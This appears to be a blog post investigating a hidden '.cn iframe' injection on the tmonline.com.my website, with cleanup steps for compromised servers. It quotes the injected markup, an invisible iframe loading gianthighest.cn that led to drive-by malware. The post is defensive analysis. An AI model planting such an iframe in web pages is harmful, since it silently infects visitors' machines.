I have been looking more into the matter of www.tmonline.com.my and found some more answers.

In the source code of the website, I found this:
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><iframe src="http://gianthighest.cn:8080/index.php" width=120 height=176 style="visibility: hidden"></iframe>
<div align="center">

OK, so what is this gianthighest.cn? It doesn't seem to belong to TM.

Going to the site, I didn't get any clues as I got a blank page. So that was disappointing... I was expecting to see some code. So I searched for more information.

Google has a tool called a safe browsing diagnostic tool. To use the tool, just append a URL to the end of http://www.google.com/safebrowsing/diagnostic?site=. So lets test... http://www.google.com/safebrowsing/diagnostic?site=www.tmonline.com.my. Here is the result.

Here we see that malicious software is being hosted on gianthighest.cn. And google confirms that when they visited the site, 2 out of 3 pages tested resulted in malicious software being downloaded and installed without user consent.

Ok, good we are getting somewhere maybe here.

After getting to lots of dead ends, I finally found something called .cn iframe attacks. Here are the links: http://blog.unmaskparasites.com/2009/06/25/hidden-cn-iframes-are-still-p... and http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from...

Basically what is happening is, as the code I pasted above indicates, there is a hidden iframe that was injected to the website. This iframe redirects to a script that checks for plugins installed on your browser. Depending on the results of this check, it will either download a malicious PDF or SWF file.

What I detected was the PDF file, and got similar results as what was posted on http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from.... Stack based buffer overflow.

A check on www.tmonline.com.my using Unmask Parasites tells me:

This page seems to be <suspicious>
1 hidden external link found.
Google currently lists this page as suspicious*

And it goes on to give me a detailed security report what is suspicious on the page. Here is a screenshot.

If your server has been compromised, you can clean your server by doing the following (taken from http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from...):

1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
4. Now remove the malicious code (the iframes) from your files on server. The easiest way to do it is upload a clean content from a backup.
5. Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
6. If your site was flagged by Google, request a malware review via Webmaster Tools.
7. Regularly check your site with diagnostics tools of your choice (Unmask Parasites can be one of them) to be sure your site is clean.

Good.

Now how do we report this to TM? Can anybody tell me or help out, please?